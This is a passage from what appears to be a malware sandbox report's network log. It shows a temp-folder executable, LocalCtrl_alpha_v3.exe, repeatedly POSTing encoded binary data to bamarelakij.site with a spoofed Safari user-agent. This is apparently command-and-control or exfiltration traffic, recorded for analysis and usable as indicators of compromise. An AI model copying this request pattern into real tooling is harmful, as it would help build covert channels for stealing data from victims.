                                                                                                                                                                  Data Ascii: j~xbsT>~YRl[\x<v;IEyg+}!9bvok+^X}{~~r]:RnkfOWRv\Pp~\n3Eyo^|=G#O>wx#wjX|qqh!w{/.EUuk;om}gVzO-x.
                                                                                                                                                                  2025-01-06 22:18:22 UTC834INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:22 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8zJdEbo0hqXELkQ4qN9ZEvlbl%2FPPgrvLbe2O1%2FLF9C3txBax89SbFZHeswu3wjfZA1JxkgpiwMWucAXrlcCtitWOpDCIAs%2ByVPQE5lJhG%2F8aTGXgjqm%2Fn%2FRtU3mtMYiplyop"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf155f6ffc41e7-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1778&rtt_var=678&sent=41&recv=114&lost=0&retrans=0&sent_bytes=2838&recv_bytes=107943&delivery_rate=1642294&cwnd=202&unsent_bytes=0&cid=4c2d7ac663b765a5&ts=793&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  18192.168.2.450112104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:23 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 745
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:23 UTC745OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 8c 8e 68 35 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a7 00 00 00 08 00 00 00 52 00 00 00 b6 ea 41 13 95 a7 40 16 d7 35 c9 59 8a 00 00 00 00 00 00 00 00 00 00 00 5b 75 a0 89 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 31 00
                                                                                                                                                                  Data Ascii: Rh5@5YFG4I`H1FG4(((RA@5Y[uI`I`I`P`I`P1
                                                                                                                                                                  2025-01-06 22:18:23 UTC821INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:23 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUDBBEDwXhkU1l0m5EJtf7Q92GkVXZKFg9zskjA857b4eyGesl6%2B5osLG5yv0OpgYYb0W%2BRv1weH66qEaXuKr38OQp7bQJkSNpZs5vb2JjBuuscbi1tP8jiULC8kxQ3xcMJB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15688a767d11-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2947&min_rtt=1830&rtt_var=1484&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1835&delivery_rate=1595628&cwnd=32&unsent_bytes=0&cid=7429a742dd5dfa8f&ts=320&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  19192.168.2.450113104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:24 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 212
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:24 UTC212OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 99 00 00 00 08 00 00 00 52 00 00 00 6f d2 a9 18 95 a7 40 16 d7 35 c9 59 83 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c c9 60 60 49 60 c8 00 31 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: Ro@5Yi``I`1i(((
                                                                                                                                                                  2025-01-06 22:18:24 UTC825INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:24 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAInfGi%2Fx1WP4UN2GawSdQlz5oYi8HspFXBA82h2LsuCsbLXwti0K35o%2FB8dUOqiSb%2F8RfNkFBq0IJrSdtbN4sCAQ9yYFz4peyB%2Fceo1Z94vX4gY70PgiaKJaILnCSEgoq3L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf156f9a0643b9-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1654&rtt_var=685&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1302&delivery_rate=1526398&cwnd=192&unsent_bytes=0&cid=c5002db0e7fb7aeb&ts=339&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  20192.168.2.450114104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:25 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 380
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:25 UTC380OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 f5 31 4e 30 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 00 00 00 08 00 00 00 52 00 00 00 8e 36 1e 13 95 a7 40 16 d7 35 c9 59 01 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 c8 48 31 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 28 a5 03 03 16
                                                                                                                                                                  Data Ascii: R1N0@5Y'I`H1'(((R6@5YGH1G(
                                                                                                                                                                  2025-01-06 22:18:25 UTC821INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:25 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lz5GvdKiHP81qBYMyTlFS6nBZFtJ1CfYZRANwaKwSWQAzutbQ66Tr0t9lyvewLbVQYGoWwBlqXWsuFdCIUL1jovUCy64b6oH5XNDpow17adgPLU8ALqi%2FxiO3aS88W%2FdwjUC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1575b9964378-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1650&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1470&delivery_rate=1713615&cwnd=235&unsent_bytes=0&cid=42f60e8a982eed72&ts=336&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  21192.168.2.450115104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:27 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 58769
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:27 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 56 e5 00 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 11 f2 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab 5d f5 de 82 ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 22 2b ab 24 a5 a6 27 23 27 27 17 38 32 33 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 22 2b ab 24 a5 a6 27 23 27 27 a9 2c 29 28 23 29 23 a9 2b 2b a1 a8 28 2c a9 a5 ab 24 a5 28 25 25 24 ac a8 ab ac ac 23 a7 27 a0 25 a8 a9 a1 a7 24 2d a0 22 21 24 aa a7 ab a7 a9 28 22 2b a0 a7 a4 a8 2b a7 21 24 a3 a6 a4 a2 27 2d a8 2d 26 a0 21 ac 22 a5 ab 2c a3 a9 aa a8 27 a9 a2 a4 27 a4
                                                                                                                                                                  Data Ascii: VR:h6@5Y4`H4(]9119.2."+$'#''823"+$'#'',)(#)#++(,$(%%$#'%$-"!$("++!$'--&!",''
                                                                                                                                                                  2025-01-06 22:18:27 UTC15331OUTData Raw: a2 22 a4 ab 23 a2 a6 a4 a9 a2 a5 2d ab 27 a1 22 2a a4 28 2a 2a a7 2d 2c a7 2d 25 a4 ac a6 a3 a5 ac a4 a5 2c 21 26 aa 29 2b ab 21 25 24 ac 23 25 a1 26 a3 2b 2b a4 a6 a0 22 aa 26 2a 2a 2b 2d a4 a7 a2 a4 28 a6 2b 25 a0 a7 28 a9 a8 a1 22 23 a6 ac 28 a9 28 a3 26 21 a4 a8 2c 2a ab 2a aa 2d a2 29 a3 21 22 2a a1 a4 29 29 2b 29 2a 27 a3 a2 27 2c 2c 29 2a 24 a2 a9 2c a8 23 aa a8 a9 29 a3 aa a8 22 a8 ab a3 2a a3 2c 2a a9 a3 22 ac ab a4 a8 2b a7 a5 a0 21 a0 a4 a0 25 a4 a2 aa 2b ac a1 2d 2c 27 ac 2b a5 28 29 29 a2 a6 ac a0 2b 22 23 22 24 ab a7 a3 a2 a5 a0 26 aa 28 21 24 a7 24 a2 27 a4 24 26 23 25 2d a0 24 2b 2a 25 a4 a8 25 21 a5 2c a7 ac a4 a7 a2 26 a1 a4 a4 a2 a1 25 21 28 2a 2a a0 a9 21 a2 a5 a3 a7 a2 a9 29 22 23 21 a0 a1 28 a7 2a 27 a6 29 2d a7 a3 ab 27 28 27 29 a7
                                                                                                                                                                  Data Ascii: "#-'"*(**-,-%,!&)+!%$#%&++"&**+-(+%("#((&!,**-)!"*))+)*'',,)*$,#)"*,*"+!%+-,'+())+"#"$&(!$$'$&#%-$+*%%!,&%!(**!)"#!(*')-'(')
                                                                                                                                                                  2025-01-06 22:18:27 UTC15331OUTData Raw: 23 a6 a4 24 23 2d 24 a4 22 28 a3 26 a7 2a 24 a1 a8 23 2d 2d a2 24 a4 a2 2c ab 27 27 2d 29 25 a8 26 ab ac a6 2b aa 24 2a 2c 24 23 23 22 2a ac 21 24 22 29 21 29 27 2a 28 26 21 2c 28 2b 23 a1 aa 2b a0 25 a7 ac a7 ab 29 a2 27 23 aa 2c 2a a9 a1 27 a1 a1 a8 25 a7 a9 a4 2a a1 23 2a a3 25 24 23 a8 a1 ac a4 a9 a5 aa a0 2b a9 29 ac a0 a9 ab 2b 25 29 22 27 a7 ac ac a1 a9 ac a7 2d ab 24 29 28 27 a9 21 ab a6 24 aa aa a2 ac aa a3 a7 2c 2b a9 ac a5 26 23 2d a0 aa a8 25 2d 22 2b 21 a2 21 24 24 a3 2c a8 24 2d 2b 25 ab 27 aa a3 26 a9 a0 ac ab a4 a2 24 a0 25 a1 28 a4 a7 24 a7 28 a1 2c a5 27 2b 29 a4 a9 21 a3 aa a0 a2 a6 a9 ac a2 a3 27 28 a8 2c a4 2a 29 a4 a4 a6 2c a7 26 a4 25 ac aa 21 a4 a2 a8 a3 2d a8 aa a0 24 29 ab a6 a5 a8 24 a1 29 24 a5 21 25 2d a8 a8 2c 23 ac 2a 27 21
                                                                                                                                                                  Data Ascii: #$#-$"(&*$#--$,''-)%&+$*,$##"*!$")!)'*(&!,(+#+%)'#,*'%*#*%$#+)+%)"'-$)('!$,+&#-%-"+!!$$,$-+%'&$%($(,'+)!'(,*),&%!-$)$)$!%-,#*'!
                                                                                                                                                                  2025-01-06 22:18:27 UTC12776OUTData Raw: a1 a6 24 ab 26 a4 2b 23 a0 a1 a8 a5 2d 2c 2c 2d 25 a7 a9 a2 27 21 25 24 2d a2 26 a4 2b a7 a1 a0 24 22 27 2d a3 2d a4 26 23 a9 a4 26 2a a9 a0 25 2c 22 21 23 a0 a4 28 24 2b 24 2c ac 24 25 24 2b a6 2b 24 a5 2b a7 a6 ac a7 a3 a3 2b a4 a5 2b 25 aa 2b ac 26 22 23 2a a4 a1 21 a1 2d a5 a9 2b 29 22 29 2a a0 26 a9 2c 23 27 a6 a1 28 26 a3 a7 a3 a9 a2 21 a5 2c a9 24 a9 24 2b 22 2b 22 a5 ab a2 24 27 a4 21 26 28 2a a6 ab a4 a1 a0 a0 a1 2b 23 ab 28 a8 27 a4 aa 2b 26 23 a9 a0 ab 28 a7 a3 22 25 23 a7 a3 2a 2c 22 24 a6 2a 23 ab 29 a2 2b 2d 2c a1 a0 21 25 a1 a5 23 ac 2c 25 a3 a0 24 a5 2a 2c 27 23 26 a4 a4 26 2a a6 21 29 2a a5 a0 a1 2a a6 a7 2b 22 21 26 a1 2b ac 22 2b 26 27 a1 22 2c a0 a0 a4 27 2a a3 a1 a1 29 2d 28 22 2a a7 23 a1 ab 2d ab 2a 24 26 a1 2b a3 29 2a a8 28 a2 21
                                                                                                                                                                  Data Ascii: $&+#-,,-%'!%$-&+$"'--&#&*%,"!#($+$,$%$++$+++%+&"#*!-+)")*&,#'(&!,$$+"+"$'!&(*+#('+&#("%#*,"$*#)+-,!%#,%$*,'#&&*!)**+"!&+"+&'",'*)-("*#-*$&+)*(!
                                                                                                                                                                  2025-01-06 22:18:28 UTC824INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:28 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kciMWU2xX1T08vUKJbEP1L3ShMP8WbPlygzwjUoQGnxUpUPhna0tCQAf8K2GY6p5cOJL2Qoa4sHQVlkIsXfA2EeQm7MQ97Nr50bR5%2FqLKnqa5EYogVENR0%2FPUpDvFwIU6HXU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1583bdbf4326-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1574&rtt_var=609&sent=25&recv=65&lost=0&retrans=0&sent_bytes=2838&recv_bytes=60015&delivery_rate=1770770&cwnd=178&unsent_bytes=0&cid=21fadd9b11c03838&ts=579&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  22192.168.2.450116104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:29 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 68882
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:29 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 d7 0c 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 97 86 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 19 98 18 9c 9b 9c d2 35 b7 37 b2 b9 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 66 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 b9
                                                                                                                                                                  Data Ascii: R!f%@5Ya3`S57%Iz7:6)9*( $=93:!"8628:9`nfPS:T):9T<9<77:<9<V767<V9;
                                                                                                                                                                  2025-01-06 22:18:29 UTC15331OUTData Raw: bf 2d ec ff 09 fd 7f aa 7d af 69 16 1b 83 22 99 fe 31 7a ff d8 06 a3 fe 53 c3 cf c5 f2 df e3 43 20 f7 c7 9a dc 48 70 db 80 a3 39 fd 8f f9 70 af d1 7a cb fc ff bf e7 cf b9 97 45 ef fa b3 0a 80 0e 2b 52 53 a1 e3 40 5b 9d 35 31 65 35 8a 81 ec b5 9d 93 ce 6e d7 8f f5 29 6d c2 bb a9 54 0a 6f 54 4d 9b 23 81 26 b2 e0 eb 63 ef 4d 75 dd 62 ec d2 b8 60 d6 07 6f 4c e2 40 be 1e 05 e2 27 03 3c e4 26 61 ed 57 86 07 2a ee 73 12 a9 c5 0b f6 12 d0 c4 c8 a6 7b 7e 60 96 4f 70 f3 2c a6 a9 fc 38 c6 46 e4 33 4e cc 2e 56 e0 27 cd f0 4d 01 6b a5 fc 02 a5 71 de 90 d1 58 16 15 2d d3 f5 ab 9b bd f3 8b 9d 47 d1 65 6d 12 57 26 2d aa 02 50 c0 65 51 3e cd 06 9e 81 68 6e db 19 6a 69 45 88 e1 73 6f e6 39 f8 7c 10 67 24 e1 2c 85 1c 04 fb 91 47 f7 c1 83 95 65 31 97 ff 48 3d 3f 8d d3 7e e7
                                                                                                                                                                  Data Ascii: -}i"1zSC Hp9pzE+RS@[51e5n)mToTM#&cMub`oL@'<&aW*s{~`Op,8F3N.V'MkqX-GemW&-PeQ>hnjiEso9|g$,Ge1H=?~
                                                                                                                                                                  2025-01-06 22:18:29 UTC15331OUTData Raw: b1 33 45 de ad e0 4e 3a 5b c3 c1 5c c9 43 7b 5d 54 77 69 17 87 92 af 4c da 00 a1 ad c7 7b 6f 8c c8 c9 fb e4 00 37 77 e1 f6 ad 31 ce 85 45 0e a4 31 ce 85 6d ba ab 63 91 22 44 bb a0 09 a1 f0 89 9d a4 d5 8c 8d a3 be bb a6 a9 57 8a 80 45 0e eb 7d b5 42 e2 ed 74 27 46 9f 6e 98 50 3e a8 45 62 fa 46 49 6c 9f bf aa d9 10 9b 46 e6 09 b1 75 be b6 9a ff 4c 57 91 21 af 37 88 13 76 46 54 17 26 4a ec a1 71 3c 23 b8 a4 e5 86 92 51 6b 4a 25 ee 3d 73 de b7 ce 20 46 e3 49 a7 22 c6 e3 19 76 b2 00 ec 8d 80 18 5e 4a 95 9b 28 ab 2a 89 b1 78 be 4a 32 17 24 d5 16 84 09 a0 10 e4 80 2b cb 12 4a e0 40 81 3d ff 92 26 ff 80 ab 95 b3 53 ef db 11 7e 1f d7 c6 b6 e9 6a c6 60 bb ee 3b 46 ef 8e 7d d6 9e 85 7a 07 9e 0a 6d e6 9a 28 ee 36 b3 d6 70 be af 14 e1 8e 8c 70 a1 7f ea 40 2c 35 e1 08
                                                                                                                                                                  Data Ascii: 3EN:[\C{]TwiL{o7w1E1mc"DWE}Bt'FnP>EbFIlFuLW!7vFT&Jq<#QkJ%=s FI"v^J(*xJ2$+J@=&S~j`;F}zm(6pp@,5
                                                                                                                                                                  2025-01-06 22:18:29 UTC15331OUTData Raw: 58 7c ec 9f 93 03 ca 48 68 e3 44 af fe 73 e2 31 2e 01 b5 57 e2 f5 06 a3 92 8e 6e 71 19 47 a5 ba bb b9 f7 d1 ed 7a 8f e9 a9 24 8d ad 16 b7 7d 4f db 7b 6e 52 bb 17 26 f4 f8 b6 ee 95 b4 fb a9 93 d2 38 8c 17 c7 b6 da 9d 7b d4 cf bc 07 bd be 76 8c d7 84 1f f2 37 41 ea 31 a9 f5 bc 73 be ef 89 7d 6c cf b1 e1 28 a1 f4 bd 97 ed 04 05 5d 35 d6 01 69 10 73 87 3c 02 35 ab c2 27 ac ee ce 1c c8 9e 2e a8 31 15 79 51 cb d5 58 72 4f b1 40 5f cb de 9c 3b 70 7d 7e 3a 34 90 e3 a8 a5 86 cb 08 db 17 33 5d b3 1b 68 c8 cb 0c b4 e9 4c 21 6d 28 fa dc 84 3e 86 bd 32 ad 1d 46 9f 7a fe a5 8a 9d eb 6e 52 bd c2 be 0e 2b d1 0b f2 d7 3a bd bc cf 21 7c e3 f7 53 9b a4 2b 62 50 26 85 f9 b2 40 8b e1 8d ba a5 a2 21 a2 34 40 2f c7 56 e5 79 86 2b 73 60 9d 43 68 a7 49 a4 e7 fe 3e 43 3e 07 36 ab
                                                                                                                                                                  Data Ascii: X|HhDs1.WnqGz$}O{nR&8{v7A1s}l(]5is<5'.1yQXrO@_;p}~:43]hL!m(>2FznR+:!|S+bP&@!4@/Vy+s`ChI>C>6
